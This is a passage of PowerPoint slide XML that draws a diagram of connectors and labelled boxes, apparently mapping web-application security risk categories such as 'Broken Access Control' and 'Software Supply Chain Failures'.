              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A9A19A-1477-F7C9-DA0E-5FABB4AECA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652200" y="589500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0" name="Straight Arrow Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89013085-6F39-8E0A-E1FD-AA14786CDD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074960" y="4901760"/>
            <a:ext cx="40716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1" name="Straight Arrow Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08833B5E-5845-D50E-794B-54C529A7542A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628080" y="2913480"/>
            <a:ext cx="40716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2" name="Straight Arrow Connector 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA06D915-855C-4786-466A-AB851D214CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358720" y="291348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3" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AD6433-DAA6-C325-3113-AABD9D895EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1214" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="3414060"/>
            <a:ext cx="362880" cy="198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5" name="Straight Arrow Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F3DDD6-2CE4-C4F5-B83A-8293E4EDE4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1193" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889340" y="1428840"/>
            <a:ext cx="436500" cy="54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6" name="Connector: Curved 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F28911-8B3F-96D3-3FCD-C23EA53FDD19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1222" idx="3"/>
            <a:endCxn id="1218" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1173600" y="3910140"/>
            <a:ext cx="31212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7" name="Straight Arrow Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446BA1DA-BB22-E17C-40B2-FA5DEF26395A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199920" y="488808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8" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6A22E6-DCF2-8D8D-7D86-FACB433F633B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369160" y="536760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9" name="Connector: Curved 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD37C36D-2690-7AF1-D8CD-785DC3D7D69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1204" idx="3"/>
            <a:endCxn id="1200" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="1925460"/>
            <a:ext cx="343440" cy="49320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80" name="Connector: Curved 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568D1FDE-F524-8881-752F-93EAC5FC04A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1215" idx="3"/>
            <a:endCxn id="1311" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="3407940"/>
            <a:ext cx="343440" cy="149472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82" name="Connector: Curved 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E221094-82AE-5A40-4E5F-6CF4841B2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1205" idx="3"/>
            <a:endCxn id="1201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="34164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83" name="Connector: Curved 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E184BC13-E446-7823-B670-568E31BCD517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1199" idx="3"/>
            <a:endCxn id="1227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="341640" cy="248076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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1284" name="Connector: Curved 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE51722D-BA21-8B6A-75EC-98BBD7D49777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1244" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265440" y="2920860"/>
            <a:ext cx="325440" cy="493200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52266"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1285" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D540CD-0BA8-3309-E8D0-F0DD3C32EB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1246" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6253560" y="3414060"/>
            <a:ext cx="33732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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1286" name="Connector: Curved 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B63D561-AE18-2AD9-E02B-B497D8642BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1311" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3902580"/>
            <a:ext cx="179640" cy="1000080"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1287" name="Connector: Curved 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B286D11-43E3-B6B9-10EA-49F8F654A49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1245" idx="3"/>
            <a:endCxn id="1246" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967640" y="3414060"/>
            <a:ext cx="35640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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1288" name="Straight Arrow Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C574F39-B1EC-4D9C-4E94-8C1B6CC356B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383560" y="3899160"/>
            <a:ext cx="39564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90" name="Connector: Curved 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D9AC6D-6A3F-0987-10F1-4809457DBE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1224" idx="3"/>
            <a:endCxn id="1220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3910140"/>
            <a:ext cx="343440" cy="487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sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7334AC-C584-2599-95B7-79FC9DC2246C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7882200" y="122004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Broken Access Control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93" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F193CCC1-722A-70C7-7437-068C0013D8ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="269100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Cryptographic Failures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94" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CD573B-1FAB-8FA5-2F6B-0C02A1A2DC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="3683160"/>
            <a:ext cx="93348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</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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Design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95" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22D44B7-2AFF-A6AE-5FCF-C0DBBC199912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="2194560"/>
            <a:ext cx="933480" cy="4186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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Software Supply Chain Failures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6" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABF4F7D-1533-0D73-ED53-3645C2FC0E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="417924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Authentication Failures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97" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E98756D7-C100-B0D3-7904-4840C363C6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="467568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Software &amp; Data Integrity Failures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98" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860FDFFC-985C-2408-1C1A-7B8A4B62584E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="517176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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t> Logging &amp; Alerting Failures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99" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C339CE66-0BA9-8020-D019-54DB73F7977B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="566784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Mishandling Exceptional Conditions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300" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9960E4EE-6ED4-DD5F-38F7-50839CD1A739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872120" y="1698480"/>
            <a:ext cx="93888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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1301" name="Straight Arrow Connector 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE016BA6-F767-1760-C5CE-990E9D0C8E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1195" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1429200"/>
            <a:ext cx="36468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sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10922993-648A-5C6F-F8AF-733DD5BB5418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588720" y="469332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Software &amp; Data Integrity Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1303" name="Straight Arrow Connector 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA869C5-3E43-CB03-B886-4C138669BA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462080" y="5381280"/>
            <a:ext cx="40356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04" name="Connector: Curved 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837092DC-DBF2-477B-CA0F-D998CB4DAB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1243" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="1429380"/>
            <a:ext cx="364320" cy="4465440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33807"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33746151-4D43-2DA7-5DA7-D56EB30D7B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7879320" y="318708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1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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1306" name="Straight Arrow Connector 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B77B721-0E9D-21E4-D1B0-6BFE94C0CF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481160" y="4365000"/>
            <a:ext cx="40356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07" name="Connector: Curved 168">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE2D444-2083-35A9-7D86-8F8F52A5753B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1212" idx="3"/>
            <a:endCxn id="1294" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2917980"/>
            <a:ext cx="357120" cy="974520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:lumMod val="85000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1308" name="Straight Arrow Connector 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AF1CFD9-4F32-B2C5-7AA0-C3D0537DA15A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="1297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517160" y="4884840"/>
            <a:ext cx="358200" cy="360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sp>
        <p:nvSpPr>
          <p:cNvPr id="1311" name="CustomShape 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B856D6EA-83E1-6E4E-DB80-156F1115E637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="469332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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1312" name="Connector: Curved 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD3CD13-99AD-8775-0903-5FADCC78EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1247" idx="3"/>
            <a:endCxn id="1300" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7520400" y="1907640"/>
            <a:ext cx="352080" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51279"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 48925"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1313" name="Connector: Curved 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C844A675-01DD-99DA-55F2-D6D4C6813155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1235" idx="3"/>
            <a:endCxn id="1221" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="3910140"/>
            <a:ext cx="341640" cy="1488600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37049"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1316" name="Connector: Curved 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4221F1F-BEA1-71F2-4991-ECCF870D0D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1201" idx="3"/>
            <a:endCxn id="1293" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1925280"/>
            <a:ext cx="357480" cy="975240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 50036"/>
              <a:gd name="adj3" fmla="val 49596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15" name="Connector: Curved 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5899904C-580C-28D5-C672-4BEF4C07738E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1207" idx="3"/>
            <a:endCxn id="1305" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2421540"/>
            <a:ext cx="361440" cy="974880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43879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89" name="Connector: Curved 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37AB725-3FDD-0CD8-E038-80EAAE70655D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1234" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4227121"/>
            <a:ext cx="171720" cy="1159379"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
